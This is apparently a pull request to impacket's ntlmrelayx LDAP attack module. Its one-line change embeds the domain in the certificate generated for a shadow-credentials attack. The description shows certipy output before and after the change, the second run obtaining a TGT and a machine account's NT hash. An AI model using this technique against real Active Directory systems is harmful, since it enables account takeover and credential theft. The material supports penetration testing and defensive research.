### PR TITLE
add SAN with UPN by default when doing shadow credentials

### DIFF
--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -284,7 +284,7 @@ class LDAPAttack(ProtocolAttack):
             LOG.info("Target user found: %s" % target_dn)
 
         LOG.info("Generating certificate")
-        key,certificate = shadow_credentials.createSelfSignedX509Certificate(subject=currentShadowCredentialsTarget, nBefore=(-40 * 365), nAfter=(40 * 365))
+        key,certificate = shadow_credentials.createSelfSignedX509Certificate(subject=currentShadowCredentialsTarget, nBefore=(-40 * 365), nAfter=(40 * 365), domain=domain)
         LOG.info("Certificate generated")
         LOG.info("Generating KeyCredential")
         keyCredential = shadow_credentials.KeyCredential(certificate,key,deviceId=shadow_credentials.getDeviceId(),currentTime=shadow_credentials.getTicksNow())


### PR DESCRIPTION
Original PR on fortra/impacket: https://github.com/fortra/impacket/pull/1875

This way, the pfx created using shadow-credentials can be instantly used with certipy without specifying the domain, e.g. before:
```
$ certipy auth -pfx withoutSAN.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[-] Username or domain is not specified, and identification information was not found in the certificate
```
After:
```
$ certipy auth -pfx withSAN.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: user$@domain.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'user.ccache'
[*] Trying to retrieve NT hash for 'user$'
[*] Got hash for 'user$@domain.local': aad3b435b51404eeaad3b435b51404ee:REDACTED

```